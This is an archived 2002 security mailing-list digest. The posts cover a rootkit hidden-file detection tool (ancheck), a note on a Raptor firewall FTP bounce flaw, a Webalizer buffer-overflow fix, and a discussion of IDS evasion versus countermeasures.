RE: An alternative method to check LKM backdoor/rootkit

2002-04-17 Thread Philippe Bourgeois

Wang Jian wrote :

 Our alternative method uses the first style: to find the differences
 between the fake view and the real view.

[...]

 We read the raw disk and traverse the filesystem on disk, bypass the
 live filesystem, and create a real view of files on disk; then traverse
 the live filesystem to get the fake view. Compare the two view, we can
 find the differences. We will find the stealth files.


For your information, I wrote the same kind of tool some time ago.

It works fine for my needs, and found all the LKM I tested, as far as
files are hidden (I mean, if the LKM doesn't hide any file, ancheck
doesn't find it). I definitly think that the Find the differences
between the two views approach is a very good approach to detect LKM.

I called my tool ancheck (alternate ncheck) because it works
more or less like the UNIX ncheck command (ncheck exists on most
UNIX systems, but not on Linux) :
http://www.cert-ist.com/francais/outils/ancheck03.tar.Z
http://www.cert-ist.com/francais/outils/ancheck03.tar.Z.sig

Ancheck is a set of 2 UNIX commands (ls_hidden and ancheck) designed
to locate hidden or deleted files. It works on UFS (Solaris) and EXT2
(Linux)
file systems. You need TCT (the Coroner's Toolkit)to compile the package.
TCT can be downloaded from :
  http://www.porcupine.org/tct
  http://www.fish.com/tct/

Philippe Bourgeois
Cert-IST




RE: Raptor Firewall FTP Bounce vulnerability

2002-04-17 Thread Martin O'Neal


Hiya,

As an observation, It's worth noting that by default the Raptor / SEF code
disables FTP PORT connections to low ports (1024), so although it might be
possible to probe a remote machine, the utility of the exercise is limited.

Regards,
Martin O'Neal
Senior Security Consultant



-Original Message-
From: Roy Hills [mailto:[EMAIL PROTECTED]]
Sent: 15 April 2002 15:12
To: [EMAIL PROTECTED]
Subject: Raptor Firewall FTP Bounce vulnerability



Re: Remote buffer overflow in Webalizer

2002-04-17 Thread Bradford L. Barrett


 Here is a patch to fix the vulnerability (tested against webalizer-2.01-06).

Bad fix.. while it will prevent the buffer from overflowing (which I still
fail to see how can be used to execute a 'root' exploit, even with a LOT
of imagination), but will cause the buffer to be filled with a non-null
terminated string which will do all sorts of nasty things to your output,
not to mention wreak havoc on the stats since you are cutting off the
domain portion, not the hostname part, and adding random garbage at the
end.

Anyway, Version 2.01-10 has been released, which fixes this and a few
other buglets that have been discovered in the last month or so.  Get it
at the usual place (web: www.mrunix.net/webalizer/ or www.webalizer.org
or ftp: ftp.mrunix.net/pub/webalizer/), and should be on the mirror sites
soon.

--
Bradford L. Barrett  [EMAIL PROTECTED]
A free electron in a sea of neutrons DoD#1750 KD4NAW

The only thing Micro$oft has done for society, is make people
believe that computers are inherently unreliable.




RE: Snort exploits

2002-04-17 Thread Grimes, Roger

Not to get even further off topic...but I will...to support Draqos.

The whole IDS evasion thing mimics the scanners vs. virus writers war.  I've
been doing antivirus work since 1989 and I have heard that virus writers
were going to polymorph, encrypt, oli-this, poly-that since before there
were 100 viruses.  Nobody, not even the AV vendors thought that scanners
would still be fighting the good fight (and winning 99.999% of the time)
when 30,000+ viruses and worms appeared.  Virus scanners would run out of
memory, wouldn't be able to keep up with the signatures, would end up with
too many false-positives, would run so slow nobody would use them, etc.  But
the truth is fingerprint scanning (no matter how flawed) still works and I
hear less about AV scanner deaths every year...and when I do hear it's from
the vendors themselves...and guess what they have the new solution sitting
in the wings ready to go.  I see the same pattern in IDS...heck, yeah, the
black hatters will develop more sophisticated hacks...and the white hatters
will fight back...SUCCESSFULLY.

With that said, there are some viruses today that scare the mess out of the
good AV guys...ones that scare them and keep them up at night.  And DDoS
Reflection attacks???...if you're not scared you don't understand the
problem.  But the good guys will respond and life will go on as usual.

Just my one cent.

Roger A. Grimes

***
*Roger A. Grimes, VP of IT for GK/PHR Holding Company
*Gold Key Resorts and Professional Hospitality Resources
*email:  [EMAIL PROTECTED]
*ph: 757-491-2101 x403
*fax:757-491-6550
*932 Laskin Road, Virginia Beach, VA 23451
*Author of Malicious Mobile Code:  Virus Protection for Windows by O'Reilly
*http://www.oreilly.com/catalog/malmobcode/
***


;-Original Message-
;From: Dragos Ruiu [mailto:[EMAIL PROTECTED]]
;Sent: Wednesday, April 17, 2002 12:08 AM
;To: [EMAIL PROTECTED]
;Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED];
;[EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]
;Subject: Re: Snort exploits


;Heh, well... first... don't panic. :-)

;I was actually expecting him to release fragroute on the CanSecWest
conference CD,
;for his talk on it there and am preparing some appropriate counter measures
for the 
;variant of snort I was going to put on there.  Been kinda swamped with
conference 
;preparations so please do not ask me for any of this in advance of the
conference.
;Odds are now that this info has gone out snort cvs will have fixes for this
;in a matter of hours or days...

;The TCP evasions are fairly easily detectable as overlaps should not
normally occur.
;I'm sure Marty or Andrew will be releasing some tweaks to stream4 shortly
to 
;address this. It is just a matter of slightly more rigorous alerting and

;To everyone else:
;The game of evasion and coutermeasures is the snake eating its tail and you

;shouldn't be naive and assume that there aren't other evasions out there
because 
;there are _always_ other obfuscations and countermeasures, and then
detectors for 
;--dr